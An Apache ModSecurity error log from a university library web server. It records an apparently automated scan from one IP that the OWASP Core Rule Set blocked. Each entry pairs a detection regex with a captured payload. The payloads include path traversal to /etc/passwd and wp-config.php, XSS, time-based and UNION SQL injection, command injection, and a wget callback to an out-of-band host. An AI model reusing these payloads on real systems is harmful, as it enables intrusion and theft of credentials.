[Tue Aug 29 11:41:39.481143 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAaZ9wIAAAAo"]
[Tue Aug 29 11:41:40.419915 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAc0NkoAAAAM"]
[Tue Aug 29 11:41:42.424203 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcqJSIAAAAG"]
[Tue Aug 29 11:41:45.430868 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gr18dz1hdqej5m.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAQSWs0AAAA0"]
[Tue Aug 29 11:41:46.375748 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAcqJT8AAAAG"]
[Tue Aug 29 11:41:49.639854 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAQSWvAAAAA0"]
[Tue Aug 29 11:41:56.416582 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdJqQQAAAAC"]
[Tue Aug 29 11:41:57.479524 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdV7XoAAAAa"]
[Tue Aug 29 11:41:58.394995 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAdPLwMAAAAT"]
[Tue Aug 29 11:42:00.377009 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gt4wpr88e8e1uu.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gt4wpr88e8e1uu.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAQSWxEAAAA0"]
[Tue Aug 29 11:42:01.407638 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdYA@8AAAAe"]
[Tue Aug 29 11:42:04.376029 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdTA@IAAAAY"]
[Tue Aug 29 11:42:05.447559 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdXIkkAAAAd"]
[Tue Aug 29 11:42:06.423939 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAc36y4AAAAO"]
[Tue Aug 29 11:42:07.415980 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdaZNIAAAAM"]
[Tue Aug 29 11:42:07.753540 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAdQ3eUAAAAV"]
[Tue Aug 29 11:42:08.364917 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAc36zMAAAAO"]
[Tue Aug 29 11:42:08.427090 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdNKFEAAAAR"]
[Tue Aug 29 11:42:09.400845 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAbo-akAAAAi"]
[Tue Aug 29 11:42:11.397104 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdQ3esAAAAV"]
[Tue Aug 29 11:42:11.433230 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdb7iAAAAAb"]
[Tue Aug 29 11:42:12.401060 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdb7iIAAAAb"]
[Tue Aug 29 11:42:14.355352 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdECakAAAAW"]
[Tue Aug 29 11:42:14.432888 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdECasAAAAW"]
[Tue Aug 29 11:42:14.433019 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAcvBjcAAAAJ"]
[Tue Aug 29 11:42:15.390550 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdUc0AAAAAZ"]
[Tue Aug 29 11:42:17.377598 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdcs9kAAAAC"]
[Tue Aug 29 11:42:19.351296 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdQ3foAAAAV"]
[Tue Aug 29 11:42:19.411096 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAQSWzMAAAA0"]
[Tue Aug 29 11:42:21.598940 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdsFgEAAAAo"]
[Tue Aug 29 11:42:23.388202 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdPLzAAAAAT"]
